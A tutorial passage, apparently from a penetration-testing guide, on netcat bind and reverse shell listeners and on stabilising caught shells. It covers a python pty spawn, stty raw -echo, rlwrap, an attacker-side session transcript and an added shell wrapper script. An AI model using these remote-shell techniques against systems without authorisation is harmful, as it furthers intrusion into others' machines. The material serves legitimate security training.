Netcat is a simple Unix utility which reads and writes data across network connections using the TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
nc is the "classic" netcat, written by Hobbit. It lacks many features found in netcat-openbsd. Note that on Kali the nc command is actually Ncat from the Nmap project, as the version banner in the transcript further down shows.
Netcat bind shell
In a bind shell the target itself listens on a chosen port and hands a shell to whoever connects, so from the attacking machine you simply connect to that port:
# nc <target-ip> <chosen-port>
Netcat reverse shell
In a reverse shell the target connects back to you, so a netcat listener must be running on the attacking (Linux) machine first. -l listens, -v is verbose, -n skips DNS lookups and -p sets the local port:
# nc -lvnp <port-number>
Stabilising netcat shells
For a netcat shell caught from a Linux target:
Spawn a better-featured bash shell with a pseudo-terminal: python -c 'import pty;pty.spawn("/bin/bash")' (use python3 where python is not on the path).
Export TERM to have access to terminal-aware commands such as clear: export TERM=xterm.
Background the shell with Ctrl+Z. Back in your own terminal, run stty raw -echo; fg to turn off local terminal echo and line processing (which gives access to tab autocompletion, the arrow keys, and Ctrl+C to kill processes inside the remote shell rather than the listener) and foreground the shell again.
adversary@kali:~# nc -lvnp <port-number>
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::<port-number>
Ncat: Listening on 0.0.0.0:<port-number>
Ncat: Connection from <target IP address>.
Ncat: Connection from <target IP address>:<target port-number>.
python -c 'import pty;pty.spawn("/bin/bash")'
shell@linux:~$ export TERM=xterm
shell@linux:~$ ^Z
[1]+  Stopped                 nc -lvnp <port-number>
adversary@kali:~# stty raw -echo; fg
nc -lvnp <port-number>
shell@linux:~$ whoami
shell
If the shell dies, anything you type in your own terminal will not be visible, because terminal echo is still disabled from the stty raw -echo step.
To fix this, type reset (blind, it will not appear on screen) and press Enter; this restores the terminal settings.
For Windows shells, where the python pty trick is not available, rlwrap can give access to history, tab autocompletion and the arrow keys immediately on receiving a shell, but some manual stabilisation must still be used to be able to use Ctrl+C inside the shell.
rlwrap is not installed by default on Kali, so first install it with sudo apt install rlwrap.
adversary@kali:~# rlwrap nc -lvnp <port-number>
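The Linux stabilisation steps and the rlwrap listener above, wrapped in one POSIX sh script. This is an added example, not code from the original page: it assumes nc (and rlwrap, when requested) are on the PATH as on Kali, and the script name catch-shell.sh and the function names are this example's own. It saves the terminal state before starting the listener and restores it when the listener exits, and it prints the stty rows/cols line that the manual steps leave out.

```shell
#!/bin/sh
# catch-shell.sh: listener wrapper for the netcat shell stabilisation
# steps. Added example, not code from the original page. Assumes nc
# (and optionally rlwrap) are installed as on Kali; script and function
# names are this example's own.
set -e

# valid_port PORT: true for 1..65535, false otherwise.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then
        return 0
    fi
    return 1
}

# local_term_size: "ROWS COLS" of the local terminal, or "24 80" when
# there is no tty (for example when the script runs non-interactively).
local_term_size() {
    if size=$(stty size 2>/dev/null) && [ -n "$size" ]; then
        echo "$size"
    else
        echo "24 80"
    fi
}

# remote_fixup ROWS COLS: the commands to paste into the remote shell
# after 'stty raw -echo; fg', so the remote pty matches the local
# terminal size and TERM is set for clear, vi, less and friends.
remote_fixup() {
    printf 'stty rows %s cols %s\nexport TERM=xterm\n' "$1" "$2"
}

# listener_cmd PORT USE_RLWRAP: the listener command line. rlwrap is
# only prepended when asked for (USE_RLWRAP=1) and actually installed;
# that is the variant to use for a Windows target.
listener_cmd() {
    if [ "$2" = 1 ] && command -v rlwrap >/dev/null 2>&1; then
        echo "rlwrap nc -lvnp $1"
    else
        echo "nc -lvnp $1"
    fi
}

# catch_shell PORT [USE_RLWRAP]: save the terminal state, print the
# remote-side commands, run the listener, and restore the terminal when
# the listener exits. The saved state is restored on EXIT, so a dead
# shell never leaves the terminal in raw -echo mode (the situation that
# otherwise needs a blind 'reset'). Ctrl+Z and 'stty raw -echo; fg'
# are still done by hand, exactly as in the transcript above.
catch_shell() {
    port=$1
    use_rlwrap=${2:-0}
    valid_port "$port" || { echo "catch_shell: bad port '$port'" >&2; return 2; }
    set -- $(local_term_size)
    saved=$(stty -g 2>/dev/null) || saved=""
    trap 'if [ -n "$saved" ]; then stty "$saved"; fi' EXIT INT TERM
    echo "Once the shell has a pty and you have run 'stty raw -echo; fg', paste into it:" >&2
    remote_fixup "$1" "$2" >&2
    $(listener_cmd "$port" "$use_rlwrap")
}

# Usage: sh catch-shell.sh PORT [1]   (1 = wrap the listener in rlwrap)
if [ "$#" -gt 0 ]; then
    catch_shell "$@"
fi
```

Run it as sh catch-shell.sh 4444 (or sh catch-shell.sh 4444 1 for a Windows target) and then proceed as in the transcript: spawn the pty, press Ctrl+Z, run stty raw -echo; fg. Because the script runs nc as its child, Ctrl+Z stops both and fg resumes both; when nc finally exits, the EXIT trap puts the terminal back as it was, whichever way the connection ended.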
The third way to stabilise a shell is to use a netcat shell as a stepping stone into a more fully-featured